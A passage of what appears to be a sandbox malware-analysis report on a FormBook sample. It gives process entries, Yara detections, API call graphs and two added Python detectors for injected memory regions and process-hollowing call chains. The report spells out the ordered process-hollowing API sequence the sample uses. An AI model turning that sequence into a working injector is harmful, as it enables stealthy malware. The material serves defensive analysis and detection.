                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:16
                                                                                                                                                Start time:10:34:09
                                                                                                                                                Start date:28/10/2024
                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                File size:862'208 bytes
                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
Programmed in: C, C++ or other language
Has exited: true

Target ID: 17
Start time: 10:34:11
Start date: 28/10/2024
Path: C:\Windows\SysWOW64\ipconfig.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\SysWOW64\ipconfig.exe"
Imagebase: 0x9e0000
File size: 29'184 bytes
MD5 hash: 3A3B9A5E00EF6A3F83BF300E2B6B67BB
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.1861222024.0000000000800000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000011.00000002.1861222024.0000000000800000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000011.00000002.1861222024.0000000000800000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.1861222024.0000000000800000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.1861222024.0000000000800000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Has exited: true
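The Yara sources listed for this process are Joe Sandbox memory-dump names. Reading them against the rest of the report: the first field is the target ID (00000011 = 17, this ipconfig.exe entry; the 07810000 dump further down carries 00000000 and its snapshot file is named hcaresult_0_2_7810000), a later field is the region base (0000000000800000), then the page protection (00000040 = PAGE_EXECUTE_READWRITE) and the region type (00040000 = MEM_MAPPED, 00020000 = MEM_PRIVATE). The following is an added example, not code from Joe Sandbox or part of this report, that decodes these names and keeps only regions that are writable and executable and not backed by a mapped image, which is the memory an injected or hollowed payload has to occupy. The full eight-field layout and the names "snapshot", "flags" and "reserved" for the fields it does not interpret are the example's own assumptions; the first two sample names are copied from this page, the third is constructed as a benign control.

```python
"""Decode Joe Sandbox memory-dump source names into region metadata.

Added example; not part of this report and not Joe Sandbox's code. The field
layout is an assumption read off the names on this page:
  <target>.<snapshot>.<serial>.<base>.<protect>.<flags>.<type>.<reserved>.sdmp
Only <target>, <base>, <protect> and <type> are interpreted; the others are
matched but otherwise ignored.
"""
import re
from dataclasses import dataclass

# Page protection constants (winnt.h)
PAGE_NOACCESS = 0x01
PAGE_READONLY = 0x02
PAGE_READWRITE = 0x04
PAGE_WRITECOPY = 0x08
PAGE_EXECUTE = 0x10
PAGE_EXECUTE_READ = 0x20
PAGE_EXECUTE_READWRITE = 0x40
PAGE_EXECUTE_WRITECOPY = 0x80
PAGE_GUARD = 0x100
PAGE_NOCACHE = 0x200
PAGE_WRITECOMBINE = 0x400

# Region types as reported by VirtualQuery (winnt.h)
MEM_PRIVATE = 0x20000
MEM_MAPPED = 0x40000
MEM_IMAGE = 0x1000000

_BASE_PROTECT_NAMES = {
    PAGE_NOACCESS: "PAGE_NOACCESS", PAGE_READONLY: "PAGE_READONLY",
    PAGE_READWRITE: "PAGE_READWRITE", PAGE_WRITECOPY: "PAGE_WRITECOPY",
    PAGE_EXECUTE: "PAGE_EXECUTE", PAGE_EXECUTE_READ: "PAGE_EXECUTE_READ",
    PAGE_EXECUTE_READWRITE: "PAGE_EXECUTE_READWRITE",
    PAGE_EXECUTE_WRITECOPY: "PAGE_EXECUTE_WRITECOPY",
}
_MODIFIER_NAMES = {PAGE_GUARD: "PAGE_GUARD", PAGE_NOCACHE: "PAGE_NOCACHE",
                   PAGE_WRITECOMBINE: "PAGE_WRITECOMBINE"}
_TYPE_NAMES = {MEM_PRIVATE: "MEM_PRIVATE", MEM_MAPPED: "MEM_MAPPED", MEM_IMAGE: "MEM_IMAGE"}

_HEX8 = r"([0-9A-Fa-f]{8})"
_NAME_RE = re.compile(
    rf"^{_HEX8}\.{_HEX8}\.(\d+)\.([0-9A-Fa-f]{{16}})\.{_HEX8}\.{_HEX8}\.{_HEX8}\.{_HEX8}\.sdmp$"
)


@dataclass(frozen=True)
class DumpSource:
    target_id: int    # matches the "Target ID" of the process entry in the report
    snapshot: int     # assumed meaning of the second field
    base: int         # region base address
    protect: int      # PAGE_* value
    region_type: int  # MEM_PRIVATE / MEM_MAPPED / MEM_IMAGE
    raw: str

    @property
    def writable_executable(self) -> bool:
        return (self.protect & 0xFF) in (PAGE_EXECUTE_READWRITE, PAGE_EXECUTE_WRITECOPY)

    @property
    def image_backed(self) -> bool:
        return self.region_type == MEM_IMAGE


def describe_protect(protect: int) -> str:
    """Render a protection value with winnt.h names, e.g. 0x104 -> PAGE_READWRITE|PAGE_GUARD."""
    base = protect & 0xFF
    parts = [_BASE_PROTECT_NAMES.get(base, f"0x{base:02x}")]
    parts += [name for bit, name in _MODIFIER_NAMES.items() if protect & bit]
    return "|".join(parts)


def describe_type(region_type: int) -> str:
    return _TYPE_NAMES.get(region_type, f"0x{region_type:x}")


def parse_dump_name(name: str) -> DumpSource:
    m = _NAME_RE.match(name)
    if m is None:
        raise ValueError(f"not a Joe Sandbox dump name: {name!r}")
    target, snapshot, _serial, base, protect, _flags, region_type, _reserved = m.groups()
    return DumpSource(target_id=int(target, 16), snapshot=int(snapshot, 16), base=int(base, 16),
                      protect=int(protect, 16), region_type=int(region_type, 16), raw=name)


def injection_candidates(names):
    """Regions that are writable+executable and not a mapped PE image.

    Sections of a legitimately loaded module are MEM_IMAGE; RWX memory outside an
    image is where unpacked or injected code (here: the FormBook payload) sits.
    """
    return [d for d in map(parse_dump_name, names) if d.writable_executable and not d.image_backed]


# First two names copied from this report (Yara source above; dump source further down);
# the third is constructed: a read-only, image-backed region that must not be flagged.
SAMPLE_NAMES = [
    "00000011.00000002.1861222024.0000000000800000.00000040.80000000.00040000.00000000.sdmp",
    "00000000.00000002.1734347846.0000000007810000.00000040.00000800.00020000.00000000.sdmp",
    "00000011.00000002.1861222024.0000000000400000.00000002.00000800.01000000.00000000.sdmp",
]

if __name__ == "__main__":
    for d in map(parse_dump_name, SAMPLE_NAMES):
        flag = "INJECTION-CANDIDATE" if d.writable_executable and not d.image_backed else "ok"
        print(f"target {d.target_id:>2}  base 0x{d.base:08x}  {describe_protect(d.protect):<24}"
              f"{describe_type(d.region_type):<12} {flag}")
```

Both report-derived names are flagged: the 0x800000 MEM_MAPPED region in ipconfig.exe is where the Yara rules fire, and the 07810000 MEM_PRIVATE region in the original process is the dynamically decrypted .NET code. JIT-emitted code also lives in RWX private memory, so this filter is a triage step that narrows which dumps to scan, not a verdict on its own.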


Execution Graph

Execution Coverage: 11.3%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 4.1%
Total number of Nodes: 193
Total number of Limit Nodes: 14

execution_graph (rendered graph; the node/edge data is reduced here to the functions that reach an API call):
• 7810d90 -> 7810dca -> 7810e78 / 7810e88 -> 7810eb6 -> 78117a0 / 78117b0 / 78117ef: CreateIconFromResourceEx
• 7a351f2 -> 7a351fc -> 7a37760 / 7a37770, which fans out to:
  - 7a37b9d / 7a37bce / 7a37bde -> 7a34c95 / 7a34ca0 (7a34e8e): CreateProcessA
  - 7a3842a -> 7a34b00 / 7a34b08 (7a34b53): ReadProcessMemory
  - 7a37f39 -> 7a34956 / 7a34958 (7a34998): VirtualAllocEx
  - 7a37e73 / 7a38013 / 7a3806c / 7a38145 / 7a38357 -> 7a34a11 / 7a34a18 (7a34a60, 7a34a86): WriteProcessMemory
  - 7a37eda / 7a38474 / 7a384bb -> 7a34440 / 7a34448 (7a3448d): Wow64SetThreadContext
  - 7a37e20 / 7a384c9 -> 7a34390 / 7a34398 (7a343d8): ResumeThread
• 7a38980 -> 7a389a6 -> 7a332d0 (7a38c00): PostMessageW
• 13f4668 -> 13f467a -> 13f4779 -> 13f479d -> 13f4878 / 13f4888 -> 13f449c (13f5918): CreateActCtxA
• 13fd458 -> 13fd49e GetCurrentProcess -> 13fd4f0 GetCurrentThread -> 13fd52d GetCurrentProcess -> 13fd58b GetCurrentThreadId
• 13fd6a0: DuplicateHandle
• 13facd0 -> 13fadb9 / 13fadc8 -> 13fadd9 -> 13fb000: GetModuleHandleW
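The 7a3xxxx functions in the execution graph all sit in the dynamically decrypted 07A30000 region of the original process and together form one ordered chain: CreateProcessA, ReadProcessMemory, VirtualAllocEx, WriteProcessMemory, Wow64SetThreadContext, ResumeThread. That is the process-hollowing sequence the report's signatures flag (suspended child, image written over from the parent, thread context redirected, thread resumed) and it is consistent with the FormBook Yara hits inside ipconfig.exe above. The following added example, not part of this report and not Joe Sandbox's code, matches that ordered chain in a per-process API trace. The trace line format, the pids, and the assumption that the trace records the CreateProcess creation flags are the example's own; the constructed first block mirrors the call chain from the graph, the second block is a benign suspended spawn that is resumed without any write.

```python
"""Match the process-hollowing API chain in a per-process API trace.

Added example; not part of this report and not Joe Sandbox's code. The trace
format is invented for the example: one call per line with the calling pid, the
API name, the pid the call targets and, for CreateProcess*, the creation flags.
"""
import re
from dataclasses import dataclass, field

CREATE_SUSPENDED = 0x00000004  # winbase.h: child starts with its primary thread suspended

# APIs implementing each stage of the chain; Nt* and WOW64 variants count the same
STAGE_OF_API = {
    "CreateProcessA": "spawn", "CreateProcessW": "spawn",
    "WriteProcessMemory": "write", "NtWriteVirtualMemory": "write",
    "SetThreadContext": "context", "Wow64SetThreadContext": "context",
    "NtSetContextThread": "context",
    "ResumeThread": "resume", "NtResumeThread": "resume",
}

_EVENT_RE = re.compile(
    r"^pid=(?P<pid>\d+)\s+api=(?P<api>\w+)\s+target=(?P<target>\d+)"
    r"(?:\s+flags=(?P<flags>0x[0-9A-Fa-f]+))?\s*$"
)


@dataclass
class Finding:
    parent: int
    child: int
    apis: list  # every call the parent made against the child, in trace order


@dataclass
class _ChildState:
    suspended: bool = False
    written: bool = False
    context_set: bool = False
    apis: list = field(default_factory=list)


def parse_event(line: str):
    """Return (pid, api, target, flags) for a call line, None for anything else."""
    m = _EVENT_RE.match(line.strip())
    if m is None:
        return None
    flags = int(m["flags"], 16) if m["flags"] else 0
    return int(m["pid"]), m["api"], int(m["target"]), flags


def detect_hollowing(trace: str) -> list:
    """Report (parent, child) when the parent spawned the child suspended, wrote into
    it and replaced a thread context before resuming it. Order matters: a resume that
    comes before any write or context change is the ordinary CREATE_SUSPENDED +
    ResumeThread pattern (debuggers, job-object setup) and is not reported."""
    state = {}
    findings = []
    for line in trace.splitlines():
        ev = parse_event(line)
        if ev is None:
            continue
        pid, api, target, flags = ev
        st = state.setdefault((pid, target), _ChildState())
        st.apis.append(api)
        stage = STAGE_OF_API.get(api)
        if stage == "spawn":
            st.suspended = bool(flags & CREATE_SUSPENDED)
        elif stage == "write":
            st.written = True
        elif stage == "context":
            st.context_set = True
        elif stage == "resume":
            if st.suspended and st.written and st.context_set:
                findings.append(Finding(pid, target, list(st.apis)))
            state.pop((pid, target))  # child is running now; later spawns start fresh
    return findings


# Constructed trace (pids invented). Block 1 mirrors the chain in the execution graph;
# block 2 is a benign suspended spawn resumed without any writes.
SAMPLE_TRACE = """\
pid=4120 api=CreateProcessA target=5044 flags=0x00000004
pid=4120 api=ReadProcessMemory target=5044
pid=4120 api=VirtualAllocEx target=5044
pid=4120 api=WriteProcessMemory target=5044
pid=4120 api=WriteProcessMemory target=5044
pid=4120 api=Wow64SetThreadContext target=5044
pid=4120 api=ResumeThread target=5044
pid=6300 api=CreateProcessA target=6412 flags=0x00000004
pid=6300 api=ResumeThread target=6412
"""

if __name__ == "__main__":
    for f in detect_hollowing(SAMPLE_TRACE):
        print(f"process hollowing: pid {f.parent} -> pid {f.child} via {' > '.join(f.apis)}")
```

The matcher keys state on the (parent, child) pair rather than on the API names alone, so a writer that only reads the child, or a parent that resumes before writing, does not trigger it. Wow64SetThreadContext is included because the injector here is a 32-bit process on a 64-bit host (the process entries show Wow64 process: true) and that is the variant the graph records.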

Control-flow Graph

control_flow_graph (rendered graph; reduced to its recoverable facts): function 7810e88, basic blocks 7810e88 to 7811754, with a call to 78117a0 / 78117b0 from block 7811307.
Strings
Memory Dump Source
• Source File: 00000000.00000002.1734347846.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7810000_Statement of Account.jbxd
Similarity
• API ID:
• String ID: Hhq$Hhq$Hhq$Hhq$Hhq
• API String ID: 0-1427472961
• Opcode ID: 7010643719e605dae524d787b9b5a1f3bc490d3cdf27eeafcb1e3a6b3326ce90
• Instruction ID: 8a186f2e3aad9461850068d25d211f2307843639f7b8fd546193aad3d971af62
• Opcode Fuzzy Hash: 7010643719e605dae524d787b9b5a1f3bc490d3cdf27eeafcb1e3a6b3326ce90
• Instruction Fuzzy Hash: D43280B4E002188FDB54DFA8C85479EBBF6BF98300F1485AAD50AEB385DB349D85CB51
Memory Dump Source
• Source File: 00000000.00000002.1734347846.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7810000_Statement of Account.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3de4b398aadecf2e9b652eab768bbaeeadb119349a636a13bb7c2460a4fdc425
• Instruction ID: 84e375212b41e1f3a136a83e03dd195d09702b5ecb382641dd4457bb8ca1f533
• Opcode Fuzzy Hash: 3de4b398aadecf2e9b652eab768bbaeeadb119349a636a13bb7c2460a4fdc425
• Instruction Fuzzy Hash: 36C197B4E002488FCF15CFA9D88479DBBB6AF89310F18C1AAD509EB255EB30D985CF40

Control-flow Graph

control_flow_graph (rendered graph; reduced to its recoverable facts): function 13fd448, basic blocks 13fd448 to 13fd625; GetCurrentProcess in block 13fd448-13fd4e7, GetCurrentThread in 13fd4f0-13fd524, GetCurrentProcess in 13fd52d-13fd561, a call to 13fd627 in 13fd56a-13fd585, GetCurrentThreadId in 13fd58b-13fd5ba.
APIs
• GetCurrentProcess.KERNEL32 ref: 013FD4D6
• GetCurrentThread.KERNEL32 ref: 013FD513
• GetCurrentProcess.KERNEL32 ref: 013FD550
• GetCurrentThreadId.KERNEL32 ref: 013FD5A9
Memory Dump Source
• Source File: 00000000.00000002.1729675977.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_13f0000_Statement of Account.jbxd
Similarity
• API ID: Current$ProcessThread
• String ID:
• API String ID: 2063062207-0
• Opcode ID: 5f7cd137d5327844ce974f6f4a23e4a4f352a8c452bcc4a7c94b67a7f5dc570c
• Instruction ID: 19a15a8d2d860c65be6095cc97aa208de6192ac73496a6d18378ff18d550d435
• Opcode Fuzzy Hash: 5f7cd137d5327844ce974f6f4a23e4a4f352a8c452bcc4a7c94b67a7f5dc570c
• Instruction Fuzzy Hash: 075188B09003498FDB14DFA9D548BEEBFF1EF88318F20845DD519A72A0D7749949CB21

Control-flow Graph

control_flow_graph (rendered graph; reduced to its recoverable facts): function 13fd458, basic blocks 13fd458 to 13fd625 (same body as 13fd448 above, different entry); GetCurrentProcess in block 13fd458-13fd4e7, GetCurrentThread in 13fd4f0-13fd524, GetCurrentProcess in 13fd52d-13fd561, a call to 13fd627 in 13fd56a-13fd585, GetCurrentThreadId in 13fd58b-13fd5ba.
APIs
• GetCurrentProcess.KERNEL32 ref: 013FD4D6
• GetCurrentThread.KERNEL32 ref: 013FD513
• GetCurrentProcess.KERNEL32 ref: 013FD550
• GetCurrentThreadId.KERNEL32 ref: 013FD5A9
Memory Dump Source
• Source File: 00000000.00000002.1729675977.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_13f0000_Statement of Account.jbxd
Similarity
• API ID: Current$ProcessThread
• String ID:
• API String ID: 2063062207-0
• Opcode ID: fa224a9e8ec3ef57f9bec1f1bb3096693f3d595e4aecc0962f7598d0c3bd6d03
• Instruction ID: 2bee3c0896b82883488802b8cea3add5371b8563d059e60049e1cf3fe2fdd7a6
• Opcode Fuzzy Hash: fa224a9e8ec3ef57f9bec1f1bb3096693f3d595e4aecc0962f7598d0c3bd6d03
• Instruction Fuzzy Hash: 295117B09003098FDB14DFA9D548B9EBBF1EF88318F20845DE519A73A0DB749989CB65

Control-flow Graph

control_flow_graph (rendered graph; reduced to its recoverable facts): function 7a34c95, basic blocks 7a34c95 to 7a34fe5; CreateProcessA is called from block 7a34e2f-7a34ee9, with 7a34eeb-7a34ef1 and 7a34ef2-7a34f78 as its two successors.
APIs
• CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07A34ED6
Memory Dump Source
• Source File: 00000000.00000002.1735163219.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7a30000_Statement of Account.jbxd
Similarity
• API ID: CreateProcess
• String ID:
• API String ID: 963392458-0
• Opcode ID: 6725f4eadddadb4b3a3910b1c810af44fa4fadf2cc8bedc22fa8e3370a756bc7
• Instruction ID: 3bfc8d89c79e4602ae3c318afc2fdc070c0d0ab4ba1bf2d357e14c7d03a0838d
• Opcode Fuzzy Hash: 6725f4eadddadb4b3a3910b1c810af44fa4fadf2cc8bedc22fa8e3370a756bc7
• Instruction Fuzzy Hash: F0A16DB1D0125ACFDF20CF68C8407EDBBB2BF88310F1485A9E818A7290DB749985CF91

Control-flow Graph: [graph not reproduced; function at 7a34ca0, calls CreateProcessA]
APIs
• CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07A34ED6
Memory Dump Source
• Source File: 00000000.00000002.1735163219.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7a30000_Statement of Account.jbxd
Similarity
• API ID: CreateProcess
• String ID:
• API String ID: 963392458-0
• Opcode ID: aada2696a7b22f8d423f812bb80c72c4e0e11ec409c3bdd1182e5cfcf3e9b06a
• Instruction ID: 517a83b62bc4e91ddfdb52f5d8ab8f9ac308765958a1f882494f11269f1984b9
• Opcode Fuzzy Hash: aada2696a7b22f8d423f812bb80c72c4e0e11ec409c3bdd1182e5cfcf3e9b06a
• Instruction Fuzzy Hash: C7916DB1D0125ADFDF20DF68C8407EDBBB2BF88310F1485A9E819A7290DB749985CF91

Control-flow Graph: [graph not reproduced; function at 13fadc8, calls GetModuleHandleW]
APIs
• GetModuleHandleW.KERNELBASE(00000000), ref: 013FB01E
Memory Dump Source
• Source File: 00000000.00000002.1729675977.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_13f0000_Statement of Account.jbxd
Similarity
• API ID: HandleModule
• String ID:
• API String ID: 4139908857-0
• Opcode ID: cf14e232e753f0fff43fc999bc3fce9594887fc36d29d52caf1f8bf04321ca97
• Instruction ID: 95cc12bff2ee67781d2d668618e0571777322baa2c788344b8470e81fec256b8
• Opcode Fuzzy Hash: cf14e232e753f0fff43fc999bc3fce9594887fc36d29d52caf1f8bf04321ca97
• Instruction Fuzzy Hash: 8F8115B0A00B458FD724DF29D45475ABBF1FF88348F00892DD68ADBA50D775E949CB90

Control-flow Graph: [graph not reproduced; function at 13f449c, calls CreateActCtxA]
APIs
• CreateActCtxA.KERNEL32(?), ref: 013F59C9
Memory Dump Source
• Source File: 00000000.00000002.1729675977.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_13f0000_Statement of Account.jbxd
Similarity
• API ID: Create
• String ID:
• API String ID: 2289755597-0
• Opcode ID: 52732b37884682d00721f9ea248ec7925d78929e0d1522d05a00cf6026cf2180
• Instruction ID: 626c1a387b36ac5c6a9b866b4bc5b46e134dc1bd713fc9deb2feed0c0f8dc259
• Opcode Fuzzy Hash: 52732b37884682d00721f9ea248ec7925d78929e0d1522d05a00cf6026cf2180
• Instruction Fuzzy Hash: 1841B2B0C0071DCBDB24DFAAC884B9EBBF5BF49314F20806AD509AB251DB756949CF90

Control-flow Graph: [graph not reproduced; function at 13f590c, calls CreateActCtxA]
APIs
• CreateActCtxA.KERNEL32(?), ref: 013F59C9
Memory Dump Source
• Source File: 00000000.00000002.1729675977.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_13f0000_Statement of Account.jbxd
Similarity
• API ID: Create
• String ID:
• API String ID: 2289755597-0
• Opcode ID: 15a54938c32be69b250f14913eb071dac2e1a0c6094c4ea89fffa4ef54e26341
• Instruction ID: 5ae26cd866188b5f8ab5b466d37463d9367f83576a64d906d469b7288c311dbd
• Opcode Fuzzy Hash: 15a54938c32be69b250f14913eb071dac2e1a0c6094c4ea89fffa4ef54e26341
• Instruction Fuzzy Hash: 8F4114B0C0071ECBDB25CFA9C88478DBBF5BF49314F20815AC509AB291DB75694ACF50

Control-flow Graph: [graph not reproduced; function at 7a34a11, calls WriteProcessMemory]
APIs
• WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07A34AA8
Memory Dump Source
• Source File: 00000000.00000002.1735163219.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7a30000_Statement of Account.jbxd
Similarity
• API ID: MemoryProcessWrite
• String ID:
• API String ID: 3559483778-0
• Opcode ID: a0ec26f66b87c4f6ad628beef1b60ed0ec750e233deb3d273a0437f27516cde1
• Instruction ID: ce8bbc020920b719f683d387a0d5088a587659d61ad40a4191112ddfa56bf470
• Opcode Fuzzy Hash: a0ec26f66b87c4f6ad628beef1b60ed0ec750e233deb3d273a0437f27516cde1
• Instruction Fuzzy Hash: 04319CB69003499FCB14CFA9C984BEEFFF1EF48310F50842AE968A7251C3349954CBA0

Control-flow Graph: [graph not reproduced; function at 78117b0, calls CreateIconFromResourceEx]
APIs
• CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?), ref: 0781186F
Memory Dump Source
• Source File: 00000000.00000002.1734347846.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7810000_Statement of Account.jbxd
Similarity
• API ID: CreateFromIconResource
• String ID:
• API String ID: 3668623891-0
• Opcode ID: dcaaa6b578d40922bbc2e95aecd3e1c919782a9ece0895a142b28c89658b6d04
• Instruction ID: 41f76ed0ce31024053f44c8ac1c51d64909ab9b05bdec5c4e2c208342e05127c
• Opcode Fuzzy Hash: dcaaa6b578d40922bbc2e95aecd3e1c919782a9ece0895a142b28c89658b6d04
• Instruction Fuzzy Hash: 59319CB59013889FCB11CFA9C804AEEBFF8EF09310F14805AE954EB261C3359854DFA1

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 904 7a34a18-7a34a66 906 7a34a76-7a34ab5 WriteProcessMemory 904->906 907 7a34a68-7a34a74 904->907 909 7a34ab7-7a34abd 906->909 910 7a34abe-7a34aee 906->910 907->906 909->910
                                                                                                                                                  APIs
                                                                                                                                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07A34AA8
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1735163219.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_7a30000_Statement of Account.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MemoryProcessWrite
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3559483778-0
                                                                                                                                                  • Opcode ID: 47b8bc46de270a02935d1c9d4faecca3c1d503a64a472b6148a9502a9b255600
                                                                                                                                                  • Instruction ID: a2582c6ebe3bcc6aaa259228190e30f61a7a2c36383b5e08ddf75106c836df2e
                                                                                                                                                  • Opcode Fuzzy Hash: 47b8bc46de270a02935d1c9d4faecca3c1d503a64a472b6148a9502a9b255600
                                                                                                                                                  • Instruction Fuzzy Hash: 5E2139B5D003599FCB10DFA9C885BEEBBF5FF88310F508429E929A7240C7789944CBA4
                                                                                                                                                  APIs
                                                                                                                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07A344C6
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1735163219.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_7a30000_Statement of Account.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ContextThreadWow64
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 983334009-0
                                                                                                                                                  • Opcode ID: bc51012a01e68cc68eb021296dfa68ffb109e0921c8a6c2d5c5fe41dc8648ac7
                                                                                                                                                  • Instruction ID: 9128acd921e435b732678babebf3f3874498d053b0f0345e8888a4be7d304f06
                                                                                                                                                  • Opcode Fuzzy Hash: bc51012a01e68cc68eb021296dfa68ffb109e0921c8a6c2d5c5fe41dc8648ac7
                                                                                                                                                  • Instruction Fuzzy Hash: B22159B19003499FDB10DFAAC4857EEBBF4EF88320F548429D459A7241DB78A945CFA1
APIs
• ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07A34B88
Memory Dump Source
• Source File: 00000000.00000002.1735163219.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7a30000_Statement of Account.jbxd
Similarity
• API ID: MemoryProcessRead
• String ID:
• API String ID: 1726664587-0
APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 013FD727
Memory Dump Source
• Source File: 00000000.00000002.1729675977.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_13f0000_Statement of Account.jbxd
Similarity
• API ID: DuplicateHandle
• String ID:
• API String ID: 3793708945-0
APIs
• Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07A344C6
Memory Dump Source
• Source File: 00000000.00000002.1735163219.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7a30000_Statement of Account.jbxd
Similarity
• API ID: ContextThreadWow64
• String ID:
• API String ID: 983334009-0
APIs
• ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07A34B88
Memory Dump Source
• Source File: 00000000.00000002.1735163219.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7a30000_Statement of Account.jbxd
Similarity
• API ID: MemoryProcessRead
• String ID:
• API String ID: 1726664587-0
APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 013FD727
Memory Dump Source
• Source File: 00000000.00000002.1729675977.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_13f0000_Statement of Account.jbxd
Similarity
• API ID: DuplicateHandle
• String ID:
• API String ID: 3793708945-0
APIs
• VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07A349C6
Memory Dump Source
• Source File: 00000000.00000002.1735163219.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7a30000_Statement of Account.jbxd
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.1735163219.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7a30000_Statement of Account.jbxd
Similarity
• API ID: ResumeThread
• String ID:
• API String ID: 947044025-0
APIs
• VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07A349C6
Memory Dump Source
• Source File: 00000000.00000002.1735163219.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7a30000_Statement of Account.jbxd
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
APIs
Memory Dump Source
